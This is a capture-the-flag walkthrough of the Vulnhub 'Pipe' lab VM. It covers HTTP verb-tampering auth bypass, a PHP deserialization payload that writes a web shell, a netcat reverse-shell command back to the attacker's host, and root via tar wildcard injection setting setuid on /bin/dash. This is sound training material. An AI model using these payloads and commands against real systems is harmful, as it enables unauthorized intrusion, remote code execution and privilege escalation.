[Vulnhub] Pipe

/dev/random: Pipe is another one CTF challange in the series /dev/random, which is created by Sagi-.

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.130/24)

Target: /dev/random: Pipe (10.1.1.143/24)

Vulnerability & Exploit

  • Basic Authentication bypass: HTTP method tamper
  • Backup file Log.php.BAK exists in the server and source code disclosure
  • Analyze and found the source code is able to upload arbitrary file, which can be used to upload web shell
  • After got a shell, enumerating and find the vulnerablity tar with wildcard * can be exploited to ROOT

Method

  • Scanned the network to discover the target server [arp-scan]
  • Port scanned the target to discover running services and open ports [masscan && nmap]
  • Using HTTP method tamper to bypass the Basic Authentication on resource page index.php [nmap with script]
  • Brute force scan to find hidden path [dirbuster]
  • Found and analysed source code in finding files php.js and Log.php.BAK, as a result, find a file upload function.
  • Write web shell to target server and use nc to get a reverse shell [nc]
  • Enumeration and exploit tar with wildcard vulnerability to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address (10.1.1.143 in this case).

1
2
3
4
5
6
7
8
9
10
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:fd:d1:6b   VMware, Inc.
10.1.1.143    00:0c:29:64:39:5e   VMware, Inc.
10.1.1.254    00:50:56:f5:74:35   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.657 seconds (96.35 hosts/sec). 4 responded

10.1.1.143 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

1
2
3
4
5
6
7
8
9
10
root@kali:~# masscan -p1-65535 10.1.1.143/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-11-21 00:47:26 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 40117/tcp on 10.1.1.143
Discovered open port 111/tcp on 10.1.1.143
Discovered open port 80/tcp on 10.1.1.143
Discovered open port 22/tcp on 10.1.1.143

There are 4 ports (22, 80, 111, 40117) detected by masscan, then I run nmap to do a deeper service scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# Nmap 6.49BETA5 scan initiated Tue Nov 17 05:50:42 2015 as: nmap -sV -v -O -A -T4 -p80,22,111,44161 -oN 10.1.1.143_nmap.txt 10.1.1.143
Nmap scan report for 10.1.1.143
Host is up (0.00035s latency).
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
|   2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|_  256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
80/tcp    open  http    Apache httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_  Basic realm=index.php
|_http-methods: No Allow or Public header in OPTIONS response (status code 401)
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          37301/udp  status
|_  100024  1          44161/tcp  status
44161/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:64:39:5E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.001 days (since Tue Nov 17 05:49:56 2015)
Network Distance: 1 hop
... turncate ...

Due to port 80 is open (providing web service on the target server), run Nikto to do a web vuln scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@kali:~/the_pipe# nikto -host 10.1.1.143
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.143
+ Target Hostname:    10.1.1.143
+ Target Port:        80
+ Start Time:         2015-11-20 19:53:42 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ / - Requires Authentication for realm 'index.php'
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ / - Requires Authentication for realm 'index.php'
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/images/".
... turncat ...
+ / - Requires Authentication for realm 'index.php'
... turncat ...
+ OSVDB-3268: /images/: Directory indexing found.
+ / - Requires Authentication for realm 'index.php'
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ / - Requires Authentication for realm 'index.php'
+ 7667 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2015-11-20 19:54:03 (GMT-5) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto scan could not find any suspicious footprint, then I try Dirbuster to brute force hidden folders / files:

Two source code files discovered in folder ‘scriptz’:

1
2
/scriptz/log.php.BAK
/scriptz/php.js

Analyze the first file “log.php.BAK”, this is a backup of “log.php” obviously, so if I can find / run “log.php” I would be able to upload shell to the target server:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<\?php
class Log
{
    public $filename = '';
    public $data = '';

    public function __construct()
    {
        $this->filename = '';
  $this->data = '';
    }

    public function PrintLog()
    {
        $pre = "[LOG]";
  $now = date('Y-m-d H:i:s');

        $str = '$pre - $now - $this->data';
        eval("\$str = \"$str\";");
        echo $str;
    }

    public function __destruct()
    {
 file_put_contents($this->filename, $this->data, FILE_APPEND);         // <== Here we can write any code into any file
    }
}
\?>

Both nmap and nikto results show us that index.php exists under the root path and it requires Basic authentication to access this page.

There is one method can be used to test if the authentication can be bypassed called http method tamper (first appears in 2004, https://bz.apache.org/bugzilla/show_bug.cgi?id=28778) and Nmap provides a script to auto-test it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@kali:~/the_pipe# nmap -p 80 --script http-method-tamper --script-args 'http-method-tamper.paths={/index.php}' 10.1.1.143

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-11-20 21:57 EST
Nmap scan report for 10.1.1.143
Host is up (0.00024s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-method-tamper:
|   VULNERABLE:
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|       This web server contains password protected resources vulnerable to authentication bypass
|       vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
|        common HTTP methods and in misconfigured .htaccess files.
|
|     Extra information:
|
|   URIs suspected to be vulnerable to HTTP verb tampering:
|     /index.php [POST]
|
|     References:
|       https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|       http://capec.mitre.org/data/definitions/274.html
|       http://www.imperva.com/resources/glossary/http_verb_tampering.html
|_      http://www.mkit.com.ar/labs/htexploit/
MAC Address: 00:0C:29:64:39:5E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds

It is vulnerable to POST method, so now I start up burp proxy to bypass the authentication and got the protected page:

Bingo! Next we will check the source code:

index.php.txt (index.php.txt) download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script src="scriptz/php.js"></script>
<script>
function submit_form() {
var object = serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'});
object = object.substr(object.indexOf("{"),object.length);
object = "O:4:\"Info\":4:" + object;
document.forms[0].param.value = object;
document.getElementById('info_form').submit();
}
</script>
<title>The Treachery of Images</title>
</head>
<h1><i>The Treachery of Images</i></h1>
<hr />
From Wikipedia, the free encyclopedia
<br />
<br />
The Treachery of Images (French: La trahison des images, 1928–29, sometimes translated as The Treason of Images) is a painting by the Belgian surrealist painter René Magritte, painted when Magritte was 30 years old. The picture shows a pipe. Below it, Magritte painted, "Ceci n'est pas une pipe." [.si ne paz‿yn pip], French for "This is not a pipe."
<p>
"The famous pipe. How people reproached me for it! And yet, could you stuff my pipe? No, it's just a representation, is it not? So if I had written on my picture 'This is a pipe', I'd have been lying!"
</p>
His statement is taken to mean that the painting itself is not a pipe. The painting is merely an image of a pipe. Hence, the description, "this is not a pipe." The theme of pipes with the text "Ceci n'est pas une pipe" is extended in his 1966 painting, Les Deux Mystères. It is currently on display at the Los Angeles County Museum of Art.
The painting is sometimes given as an example of meta message conveyed by paralanguage. Compare with Korzybski's "The word is not the thing" and "The map is not the territory".
<br />
<br />
<center><div style="width:500px;overflow:hidden;" >
   <img src="images/pipe.jpg" width="400px" height="auto" border="1">
</div>
<form action="index.php" id="info_form" method="POST">
   <input type="hidden" name="param" value="" />
   <a href="#" onclick="submit_form(); return false;">Show Artist Info.</a>
</form></center></html>

It loads scriptz/php.js and there is a link pointing to function submit_form with a hidden value param, then I use burp proxy to check what data will be sent when I click the link Show Artist Info, after URL decoded, I found the following data:

1
O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The Treachery of Images";}

After a close look at the source code in php.js, Log.php.BAK and index.php, I can manage to construct the following payload to upload a web shell:

1
O:3:"Log":2:{s:8:"filename";s:31:"/var/www/html/scriptz/shell.php";s:4:"data";s:30:"<\?php system($_GET['cmd']); \?>";}

Here we can see that shell.php has been created under folder scriptz and now we can run system commands.

The following URL will give us a reverse shell connect back to attacker’s port 4444

1
http://10.1.1.143/scriptz/shell.php?cmd=nc+-e+/bin/sh+10.1.1.130+4444
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~/the_pipe# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.143] 33575
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/html/scriptz
ls -al
total 24
drwxr-xr-x 2 www-data www-data 4096 Nov 22 07:20 .
drwxr-xr-x 4 www-data www-data 4096 Jul  9 13:49 ..
-rw-r--r-- 1 www-data www-data   94 Jul  9 13:51 .htaccess
-rw-r--r-- 1 www-data www-data  474 Jul  6 02:26 log.php.BAK
-rw-r--r-- 1 www-data www-data 3768 Jul  5 19:02 php.js
-rw-r--r-- 1 www-data www-data   35 Nov 22 07:20 shell.php

Then using python to jail break the shell and start enumerating

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
python -c "import pty; pty.spawn('/bin/bash');"
www-data@pipe:/var/www/html/scriptz$cd ..
www-data@pipe:/var/www/html$ ls -al

total 36
drwxr-xr-x 4 www-data www-data 4096 Jul  9 13:49 .
drwxr-xr-x 3 root     root     4096 Jul  5 14:46 ..
-rw-r--r-- 1 www-data www-data  137 Jul  6 02:43 .htaccess
-rw-r--r-- 1 www-data www-data   43 Jul  6 09:33 .htpasswd
drwxr-xr-x 2 www-data www-data 4096 Jul  6 02:53 images
-rw-r--r-- 1 www-data www-data 2801 Jul  9 13:49 index.php
-rw-r--r-- 1 www-data www-data  150 Jul  6 01:50 info.php
-rw-r--r-- 1 www-data www-data  474 Jul  6 03:43 log.php
drwxr-xr-x 2 www-data www-data 4096 Nov 22 07:20 scriptz
www-data@pipe:/var/www/html$ cat  .htpasswd

rene:$apr1$wfYjXf4U$0ZZ.qhGGrtkOxvKr5WFqX/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
www-data@pipe:/home/rene$ ls  -al

total 24
drwxr-xr-x 3 rene rene 4096 Jul  6 07:42 .
drwxr-xr-x 3 root root 4096 Jul  5 14:09 ..
-rw-r--r-- 1 rene rene  220 Jul  5 14:09 .bash_logout
-rw-r--r-- 1 rene rene 3515 Jul  5 14:09 .bashrc
-rw-r--r-- 1 rene rene  675 Jul  5 14:09 .profile
drwxrwxrwx 2 rene rene 4096 Nov 22 07:38 backup
www-data@pipe:/home/rene$ ls  -al  backup

total 140
drwxrwxrwx 2 rene rene  4096 Nov 22 07:38 .
drwxr-xr-x 3 rene rene  4096 Jul  6 07:42 ..
-rw-r--r-- 1 rene rene 65404 Nov 22 07:35 backup.tar.gz
-rw-r--r-- 1 rene rene 22959 Nov 22 07:38 sys-11286.BAK
-rw-r--r-- 1 rene rene 23376 Nov 22 07:37 sys-20270.BAK
-rw-r--r-- 1 rene rene 19123 Nov 22 07:36 sys-7508.BAK
www-data@pipe:/home/rene$ ls  -al  backup

total 156
drwxrwxrwx 2 rene rene  4096 Nov 22 07:39 .
drwxr-xr-x 3 rene rene  4096 Jul  6 07:42 ..
-rw-r--r-- 1 rene rene 65404 Nov 22 07:35 backup.tar.gz
-rw-r--r-- 1 rene rene 22959 Nov 22 07:38 sys-11286.BAK
-rw-r--r-- 1 rene rene 13451 Nov 22 07:39 sys-17501.BAK
-rw-r--r-- 1 rene rene 23376 Nov 22 07:37 sys-20270.BAK
-rw-r--r-- 1 rene rene 19123 Nov 22 07:36 sys-7508.BAK

Here we noticed that system doing backup automatically, so I go to check cron entry in /etc/crontab:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
www-data@pipe:/home/rene$ cat  /etc/crontab

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *  * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6  * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh

Trying to check the script code in both .sh file, but only /usr/bin/compress.sh can be read:

1
2
3
4
5
6
7
8
9
www-data@pipe:/home/rene/backup$ cat /usr/bin/compress.sh
cat /usr/bin/compress.sh
#!/bin/sh

rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK

Here I noticed that tar is used with wildcard *, which can be exploited to execute arbitrary commands.

Here is the details about Unix wildcard exploit, the relevant information about tar can be found in point 4.3.

I will use setuid a shell command to get a ROOT shell, first of all, I have to check what kind of shell installed in the server.:

1
2
3
4
5
6
www-data@pipe:/home/rene/backup$ ls -al /bin/*sh
ls -al /bin/*sh
-rwxr-xr-x 1 root root 1029624 Nov 13  2014 /bin/bash
-rwxr-xr-x 1 root root  125400 Nov  8  2014 /bin/dash
lrwxrwxrwx 1 root root       4 Nov 13  2014 /bin/rbash -> bash
lrwxrwxrwx 1 root root       4 Nov  8  2014 /bin/sh -> dash

Cool, I found /bin/dash appeared in the list, now I am going to create evil script and ROOT it:

1
2
3
4
5
6
7
8
9
www-data@pipe:/home/rene/backup$cd /home/rene/backup
www-data@pipe:/home/rene/backup$echo > --checkpoint=1;
www-data@pipe:/home/rene/backup$echo > --checkpoint-action=exec=sh\ shell.sh;
www-data@pipe:/home/rene/backup$echo 'chmod u+s /bin/dash' > shell.sh
www-data@pipe:/home/rene/backup$echo 'touch /home/rene/backup/done' >> shell.sh
www-data@pipe:/home/rene/backup$cat shell.sh 
chmod u+s /bin/dash
touch /home/rene/backup/done
www-data@pipe:/home/rene/backup$chmod +x shell.sh

Now just waiting for couple of minutes and you will find that a new file named done has been created.

1
2
3
4
5
6
7
8
9
10
# ls -al
ls -al
total 44
-rw-r--r-- 1 www-data www-data     1 Nov 22 08:07 --checkpoint-action=exec=sh shell.sh
-rw-r--r-- 1 www-data www-data     1 Nov 22 08:07 --checkpoint=1
drwxrwxrwx 2 rene     rene      4096 Nov 24 05:40 .
drwxr-xr-x 3 rene     rene      4096 Jul  6 07:42 ..
-rw-r--r-- 1 rene     rene     20927 Nov 24 05:40 backup.tar.gz
-rw-r--r-- 1 root     root         0 Nov 24 05:40 done
-rwxr-xr-x 1 www-data www-data    49 Nov 23 07:03 shell.sh

Now it is ready to run /bin/dash and enjoy the ROOT!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
www-data@pipe:/home/rene/backup$ /bin/dash
/bin/dash
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
whoami
root
# ls -al /root
ls -al /root
total 28
drwx------  2 root root 4096 Jul  9 13:53 .
drwxr-xr-x 22 root root 4096 Jul  5 14:01 ..
lrwxrwxrwx  1 root root    9 Jul  5 14:12 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
lrwxrwxrwx  1 root root    9 Jul  9 13:53 .nano_history -> /dev/null
-rw-r--r--  1 root root  140 Nov 20  2007 .profile
-rwx------  1 root root  120 Jul  6 08:59 create_backup.sh
-rw-------  1 root root 4251 Jul  6 10:41 flag.txt
# cat /root/flag.txt
cat /root/flag.txt
                                                                   .aMMMMMMMMn.  ,aMMMMn.
                                                                 .aMccccccccc*YMMn.    `Mb
                                                                aMccccccccccccccc*Mn    MP
                                                               .AMMMMn.   MM `*YMMY*ccaM*
                                                              dM*  *YMMb  YP        `cMY
                                                              YM.  .dMMP   aMn.     .cMP
                                                               *YMMn.     aMMMMMMMMMMMY'
                                                                .'YMMb.           ccMP
                                                             .dMcccccc*Mc....cMb.cMP'
                                                           .dMMMMb;cccc*Mbcccc,IMMMMMMMn.
                                                          dY*'  '*M;ccccMM..dMMM..MP*cc*Mb
                                                          YM.    ,MbccMMMMMMMMMMMM*cccc;MP
                                                           *Mbn;adMMMMMMMMMMMMMMMIcccc;M*
                                                          dPcccccIMMMMMMMMMMMMMMMMa;c;MP
                                                          Yb;cc;dMMMMMMMMMMMP*'  *YMMP*
                                                           *YMMMPYMMMMMMP*'          curchack
                                                       +####################################+
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       +----------------------------------+-+
                                                        ####################################
                                                             |======                  |
                                                             |======                  |
                                                             |=====                   |
                                                             |====                    |
                                                             |                        |
                                                             +                        +

 .d8888b.                 d8b          d8b               888                                                                    d8b
d88P  Y88b                Y8P          88P               888                                                                    Y8P
888    888                             8P                888
888        .d88b.  .d8888b888   88888b."  .d88b. .d8888b 888888   88888b.  8888b. .d8888b    888  88888888b.  .d88b.    88888b. 88888888b.  .d88b.
888       d8P  Y8bd88P"   888   888 "88b d8P  Y8b88K     888      888 "88b    "88b88K        888  888888 "88bd8P  Y8b   888 "88b888888 "88bd8P  Y8b
888    88888888888888     888   888  888 88888888"Y8888b.888      888  888.d888888"Y8888b.   888  888888  88888888888   888  888888888  88888888888
Y88b  d88PY8b.    Y88b.   888   888  888 Y8b.         X88Y88b.    888 d88P888  888     X88   Y88b 888888  888Y8b.       888 d88P888888 d88PY8b.   d8b
 "Y8888P"  "Y8888  "Y8888P888   888  888  "Y8888  88888P' "Y888   88888P" "Y888888 88888P'    "Y88888888  888 "Y8888    88888P" 88888888P"  "Y8888Y8P
                                                                  888                                                   888        888
                                                                  888                                                   888        888
                                                                  888                                                   888        888
Well Done!
Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7
2015-11-23 21:43:52 +1100